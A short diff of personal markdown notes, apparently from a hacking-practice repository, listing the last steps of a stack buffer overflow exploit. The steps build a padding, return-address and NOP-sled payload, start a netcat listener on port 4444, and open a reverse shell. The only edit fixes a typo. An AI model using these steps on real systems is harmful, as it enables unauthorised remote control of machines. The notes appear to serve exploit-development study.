Anonymvs17/hacking/notes/bufferoverflow.md

 * Copy this into our python file as overflow variable like: ``buffer = "A" * 2003 + "B" * 4 + "\xaf\x11\x50\x62" + overflow``
 * Add naf space to variable (play a bit around with the size: "\x90" * 8) ``buffer = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 8 +  overflow``=> example bufferOverflowHelperFinal.py
 * Start netcat on linux by listening on port 4444
-* Run applicatino in admin mode and execute script
+* Run application in admin mode and execute script
 * Reverse shell established